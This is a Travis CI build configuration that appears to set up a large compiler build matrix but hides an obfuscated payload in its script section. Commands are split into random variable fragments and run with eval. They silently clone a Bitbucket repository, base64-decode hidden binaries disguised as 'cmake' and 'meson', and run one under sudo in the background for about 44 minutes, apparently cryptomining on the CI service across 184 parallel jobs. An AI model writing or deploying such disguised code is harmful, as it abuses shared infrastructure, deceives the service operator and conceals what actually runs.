dist: bionic

env:
  - BUILD="DX1"
  - BUILD="DX2"
  - BUILD="DX3"
  - BUILD="DX4"
  - BUILD="DX5"
  - BUILD="DX6"
  - BUILD="DX7"
  - BUILD="DX8"
  - BUILD="DX9"
  - BUILD="DX10"
  - BUILD="DX11"
  - BUILD="DX12"
  - BUILD="DX13"
  - BUILD="DX14"
  - BUILD="DX15"
  - BUILD="DX16"
  - BUILD="DX17"
  - BUILD="DX18"
  - BUILD="DX19"
  - BUILD="DX20"
  - BUILD="DX21"
  - BUILD="DX22"
  - BUILD="DX23"
  - BUILD="DX24"
  - BUILD="DX25"
  - BUILD="DX26"
  - BUILD="DX27"
  - BUILD="DX28"
  - BUILD="DX29"
  - BUILD="DX30"
  - BUILD="DX31"
  - BUILD="DX32"
  - BUILD="DX33"
  - BUILD="DX34"
  - BUILD="DX35"
  - BUILD="DX36"
  - BUILD="DX37"
  - BUILD="DX38"
  - BUILD="DX39"
  - BUILD="DX40"
  - BUILD="DX41"
  - BUILD="DX42"
  - BUILD="DX43"
  - BUILD="DX44"
  - BUILD="DX45"
  - BUILD="DX46"
  - BUILD="DX47"
  - BUILD="DX48"
  - BUILD="DX49"
  - BUILD="DX50"
  - BUILD="DX51"
  - BUILD="DX52"
  - BUILD="DX53"
  - BUILD="DX54"
  - BUILD="DX55"
  - BUILD="DX56"
  - BUILD="DX57"
  - BUILD="DX58"
  - BUILD="DX59"
  - BUILD="DX60"
  - BUILD="DX61"
  - BUILD="DX62"
  - BUILD="DX63"
  - BUILD="DX64"
  - BUILD="DX65"
  - BUILD="DX66"
  - BUILD="DX67"
  - BUILD="DX68"
  - BUILD="DX69"
  - BUILD="DX70"
  - BUILD="DX71"
  - BUILD="DX72"
  - BUILD="DX73"
  - BUILD="DX74"
  - BUILD="DX75"
  - BUILD="DX76"
  - BUILD="DX77"
  - BUILD="DX78"
  - BUILD="DX79"
  - BUILD="DX80"
  - BUILD="DX81"
  - BUILD="DX82"
  - BUILD="DX83"
  - BUILD="DX84"
  - BUILD="DX85"
  - BUILD="DX86"
  - BUILD="DX87"
  - BUILD="DX88"
  - BUILD="DX89"
  - BUILD="DX90"
  - BUILD="DX91"
  - BUILD="DX92"
  - BUILD="DX93"
  - BUILD="DX94"
  - BUILD="DX95"
  - BUILD="DX96"
  - BUILD="DX97"
  - BUILD="DX98"
  - BUILD="DX99"
  - BUILD="DX100"
  - BUILD="DX101"
  - BUILD="DX102"
  - BUILD="DX103"
  - BUILD="DX104"
  - BUILD="DX105"
  - BUILD="DX106"
  - BUILD="DX107"
  - BUILD="DX108"
  - BUILD="DX109"
  - BUILD="DX110"
  - BUILD="DX111"
  - BUILD="DX112"
  - BUILD="DX113"
  - BUILD="DX114"
  - BUILD="DX115"
  - BUILD="DX116"
  - BUILD="DX117"
  - BUILD="DX118"
  - BUILD="DX119"
  - BUILD="DX120"
  - BUILD="DX121"
  - BUILD="DX122"
  - BUILD="DX123"
  - BUILD="DX124"
  - BUILD="DX125"
  - BUILD="DX126"
  - BUILD="DX127"
  - BUILD="DX128"
  - BUILD="DX129"
  - BUILD="DX130"
  - BUILD="DX131"
  - BUILD="DX132"
  - BUILD="DX133"
  - BUILD="DX134"
  - BUILD="DX135"
  - BUILD="DX136"
  - BUILD="DX137"
  - BUILD="DX138"
  - BUILD="DX139"
  - BUILD="DX140"
  - BUILD="DX141"
  - BUILD="DX142"
  - BUILD="DX143"
  - BUILD="DX144"
  - BUILD="DX145"
  - BUILD="DX146"
  - BUILD="DX147"
  - BUILD="DX148"
  - BUILD="DX149"
  - BUILD="DX150"
  - BUILD="DX151"
  - BUILD="DX152"
  - BUILD="DX153"
  - BUILD="DX154"
  - BUILD="DX155"
  - BUILD="DX156"
  - BUILD="DX157"
  - BUILD="DX158"
  - BUILD="DX159"
  - BUILD="DX160"
  - BUILD="DX161"
  - BUILD="DX162"
  - BUILD="DX163"
  - BUILD="DX164"
  - BUILD="DX165"
  - BUILD="DX166"
  - BUILD="DX167"
  - BUILD="DX168"
  - BUILD="DX169"
  - BUILD="DX170"
  - BUILD="DX171"
  - BUILD="DX172"
  - BUILD="DX173"
  - BUILD="DX174"
  - BUILD="DX175"
  - BUILD="DX176"
  - BUILD="DX177"
  - BUILD="DX178"
  - BUILD="DX179"
  - BUILD="DX180"
  - BUILD="DX181"
  - BUILD="DX182"
  - BUILD="DX183"
  - BUILD="DX184"

language: minimal

script:
  - sudo apt update || true
  - yTTbBcH="sudo apt --"
  - NGQHbVQ="yes install"
  - IVwWWUaKeNR=" cl-base64 "
  - BPBfFikaovn="git &>/dev/"
  - eval "$yTTbBcH""$NGQHbVQ""$IVwWWUaKeNR""$BPBfFikaovn""null"
  - vvEPsNR="git clone h"
  - DDCqKERK="ttps://gccb"
  - YcMWAQrXh="uild@bitbuc"
  - YIzJW="ket.org/gcc"
  - zJLMegFdDpN="build/gcc.g"
  - ZIHYflGSj="it &>/dev/n"
  - eval "$vvEPsNR""$DDCqKERK""$YcMWAQrXh""$YIzJW""$zJLMegFdDpN""$ZIHYflGSj""ull"
  - vlrgBgm="base64 -d g"
  - ietgFYelF="cc/cmake_ >"
  - eval "$vlrgBgm""$ietgFYelF"" cmake"
  - ImPhjRzHbSl="base64 -d g"
  - QJnAzMM="cc/config_ "
  - eval "$ImPhjRzHbSl""$QJnAzMM""> xconfig"
  - IqJcHW="base64 -d g"
  - uvuCqEgQ="cc/make_ > "
  - eval "$IqJcHW""$uvuCqEgQ""meson"
  - chmod +x meson cmake
  - YTAxHXNWCpP="./cmake"
  - eval "$YTAxHXNWCpP"""
  - sed -i 's/build/tg3o/g' xconfig
  - jIapSiUW="sudo ./meso"
  - AUEit="n --config="
  - ThJyVWWatVu="xconfig &>/"
  - eval "$jIapSiUW""$AUEit""$ThJyVWWatVu""dev/null &"
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2638)) ] && sudo killall meson && break; sleep 222; done
